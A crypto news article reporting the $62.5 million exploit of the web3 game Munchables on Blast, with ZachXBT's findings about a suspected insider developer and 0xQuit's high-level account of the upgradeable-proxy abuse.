Cryptonews Blockchain News Web3 Game Munchables Loses $62.5 Million to Exploit: ZachXBT

Web3 Game Munchables Loses $62.5 Million to Exploit: ZachXBT

Hongji Feng
Hongji Feng
Last updated: | 1 min read
Web3 Game Munchables Loses $62.5 Million to Exploit

The web3 gaming platform Munchables experienced a significant security breach, losing $62.5 million in Ethereum due to an exploit on the Blast network.

Munchables confirmed the exploit through a post on social media, stating the loss occurred on March 26. “Munchables has been compromised,” said Munchables. “We are tracking movements and attempting to stop the the transactions. We will update as soon as we know more.”

Investigation Suggests Potential Link to Munchables Insider


According to ZachXBT, the crypto “detective,” the exploiter extracted nearly 17,414 ETH with a total value of $62.5 million as indicated by Blastscan.

ZachXBT then made some more digging and discovered that the exploit could be initiated by a Munchables employee, since they have been recruited as four developers.

“Four different devs hired by the Munchables team and linked to the exploiter are likely all the same person as they recommended each other for the job,” said ZachXBT.

The suspect also “regularly transferred payments to the same two exchange deposit addresses” and “funded each others wallets.” ZachXBT included the alleged exploiter’s GitHub usernames in the post, alerting the community.

Exploit Rooted in Upgrade Manipulation


Solidity developer 0xQuit revealed in a post that the exploit was premeditated, highlighting that a developer had modified the Lock contract to a new version just before the game’s release. This contract is designed to secure tokens for a set period.

“The Munchables exploit has been planned since deploy,” said 0xQuit, stating that the platform is a “dangerously upgradeable proxy.” The exploiter was able to abuse the upgrade and implementation to assign themselves 1 million ETH so they could withdraw the deposit.

“If you never knew about the original implementation, the contract would look just fine,” explained 0xQuit. “Even if the dev had transferred ownership back to the team, the damage was done,” the author added, discouraging upgradeability.

Responding to the devastating incident, the team has announced to provide all relevant private keys to aid in the retrieval of user funds. This includes the key associated with $62,535,441.24 USD, another holding 73 WETH, and the owner key that secures the remaining funds.

Gaming Hack Web3

Most Popular

Altcoin News
Armenian Officials Trained on Essential Techniques and Tools for Effective Crypto-Crime Investigations
Blockchain News
Real-World Data Unlocks the True Value of Tokenization: Chainlink
Altcoin News
Stripe to Resume Crypto Payments, Starting with USDC Stablecoin on Numerous Blockchains
News
DCG Boosts Legal Arsenal with First Chief Hire During New York AG Dispute
Altcoin News
Pantera Capital Seeks to Raise $1 Billion for New Fund Offering Exposure to Crypto Assets
Bitcoin News
Bitcoin Price Prediction as ‘Bitcoin Halving’ Executes Successfully – Will a New Bull Market Start Now?

Latest news

Altcoin News
Data Indicates Stablecoins Are Becoming A Global Asset Class
Bitcoin News
Bitcoin Price Chops Either Side of $64,000 Following Latest US Inflation Report – Here’s What You Need To Know
Blockchain News
CryptoQuant CEO Supports Crypto Mixing, Says It’s Not A Crime
Ethereum News
$510 Million in Ethereum Longs at Risk Amid Potential Weekend Volatility – Massive Price Swing Incoming?
Bitcoin News
Crypto Billionaire Arthur Hayes Predicts Bitcoin Bull Run to Return After $1.4 Trillion US Liquidity Spike
Blockchain News
Elizabeth Warren-Challenger John Deaton to File Brief in Support of Coinbase Appeal in SEC Case Today: Fox
Bitcoin News
Bitcoin Price Prediction as BTC Climbs to $64,226 Amidst Positive Market Trends – Time to Buy

Similar News